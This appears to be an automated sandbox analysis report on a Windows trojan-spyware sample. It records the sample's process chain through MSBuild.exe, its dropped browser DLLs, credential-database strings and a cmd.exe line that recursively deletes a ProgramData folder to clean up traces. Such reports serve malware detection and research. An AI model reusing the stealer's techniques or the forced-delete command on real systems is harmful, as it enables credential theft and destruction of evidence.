Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_0030B078	15_2_0030B078
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_003351A8	15_2_003351A8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_003071D8	15_2_003071D8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002D729C	15_2_002D729C
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002ED39B	15_2_002ED39B
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_003333C8	15_2_003333C8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_00305468	15_2_00305468
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_003194C8	15_2_003194C8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002E572C	15_2_002E572C
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_00307728	15_2_00307728
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_0033B778	15_2_0033B778
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_00341918	15_2_00341918
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002EBB36	15_2_002EBB36
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_00329BA8	15_2_00329BA8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002E3C92	15_2_002E3C92
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002D1D79	15_2_002D1D79
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_00307DE8	15_2_00307DE8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002DFEF0	15_2_002DFEF0
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002FDED8	15_2_002FDED8

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6D3909D0 appears 299 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 004047E8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6D233620 appears 93 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6D39DAE0 appears 69 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 004104BC appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 004105DE appears 71 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6D39D930 appears 56 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6D349F30 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6D239B10 appears 93 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6D26C5E0 appears 35 times
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: String function: 0031A1D8 appears 152 times
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: String function: 00309978 appears 93 times
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: String function: 002D7B80 appears 49 times
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: String function: 00357B80 appears 49 times

One or more processes crash

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2024 -s 260

Sample file is different than original file name gathered from version info

Source: VmRHSCaiyc.exe, 00000004.00000000.1278493114.00000000003E0000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenameproquota.exej% vs VmRHSCaiyc.exe
Source: VmRHSCaiyc.exe	Binary or memory string: OriginalFilenameproquota.exej% vs VmRHSCaiyc.exe

Uses 32bit PE files

Source: VmRHSCaiyc.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: VmRHSCaiyc.exe	Static PE information: Section: .data ZLIB complexity 0.9919846754807692
Source: HCFIIIJJKJ.exe.5.dr	Static PE information: Section: .data ZLIB complexity 0.9912150349650349
Source: a43486128347[1].exe.5.dr	Static PE information: Section: .data ZLIB complexity 0.9912150349650349

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@14/36@15/6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 5_2_6D270300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

5_2_6D270300

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 5_2_0041147A CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

5_2_0041147A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 5_2_0041196C __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z,__EH_prolog3_catch,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear,

5_2_0041196C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\19VBZ7FS.htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7868:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7732
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2024

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File created: C:\Users\user~1\AppData\Local\Temp\delays.tmp

Jump to behavior

Source: C:\ProgramData\HCFIIIJJKJ.exe	Command line argument: MZx	15_2_002D2021
Source: C:\ProgramData\HCFIIIJJKJ.exe	Command line argument: MZx	15_2_002D2021
Source: C:\ProgramData\HCFIIIJJKJ.exe	Command line argument: MZx	15_2_002D2021

Source: VmRHSCaiyc.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.dr, softokn3[1].dll.5.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: MSBuild.exe, 00000005.00000002.1817017421.000000006D39F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1778653897.000000001A032000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788346120.000000001FFA8000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, sql[1].dll.5.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.dr, softokn3[1].dll.5.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: MSBuild.exe, 00000005.00000002.1817017421.000000006D39F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1778653897.000000001A032000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788346120.000000001FFA8000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, sql[1].dll.5.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: MSBuild.exe, 00000005.00000002.1817017421.000000006D39F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1778653897.000000001A032000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788346120.000000001FFA8000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, sql[1].dll.5.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: MSBuild.exe, 00000005.00000002.1817017421.000000006D39F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1778653897.000000001A032000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788346120.000000001FFA8000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, sql[1].dll.5.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.dr, softokn3[1].dll.5.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.dr, softokn3[1].dll.5.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: MSBuild.exe, 00000005.00000002.1778653897.000000001A032000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788346120.000000001FFA8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.5.dr	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.dr, softokn3[1].dll.5.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.dr, softokn3[1].dll.5.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: MSBuild.exe, 00000005.00000002.1778653897.000000001A032000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788346120.000000001FFA8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.5.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.dr, softokn3[1].dll.5.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: MSBuild.exe, MSBuild.exe, 00000005.00000002.1817017421.000000006D39F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1778653897.000000001A032000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788346120.000000001FFA8000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, sql[1].dll.5.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: MSBuild.exe, 00000005.00000002.1817017421.000000006D39F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1778653897.000000001A032000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788346120.000000001FFA8000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, sql[1].dll.5.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.dr, softokn3[1].dll.5.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: MSBuild.exe, 00000005.00000002.1778653897.000000001A032000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788346120.000000001FFA8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.5.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: ECGIII.5.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.dr, softokn3[1].dll.5.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: MSBuild.exe, 00000005.00000002.1778653897.000000001A032000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788346120.000000001FFA8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.5.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: MSBuild.exe, 00000005.00000002.1778653897.000000001A032000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788346120.000000001FFA8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.5.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.dr, softokn3[1].dll.5.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: VmRHSCaiyc.exe	ReversingLabs: Detection: 50%
Source: VmRHSCaiyc.exe	Virustotal: Detection: 47%

Source: unknown	Process created: C:\Users\user\Desktop\VmRHSCaiyc.exe "C:\Users\user\Desktop\VmRHSCaiyc.exe"
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2024 -s 260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\ProgramData\HCFIIIJJKJ.exe "C:\ProgramData\HCFIIIJJKJ.exe"
Source: C:\ProgramData\HCFIIIJJKJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\ProgramData\HCFIIIJJKJ.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7732 -s 272
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KKEHIEBKJKFI" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\ProgramData\HCFIIIJJKJ.exe "C:\ProgramData\HCFIIIJJKJ.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KKEHIEBKJKFI" & exit	Jump to behavior
Source: C:\ProgramData\HCFIIIJJKJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\ProgramData\HCFIIIJJKJ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: VmRHSCaiyc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: VmRHSCaiyc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: VmRHSCaiyc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
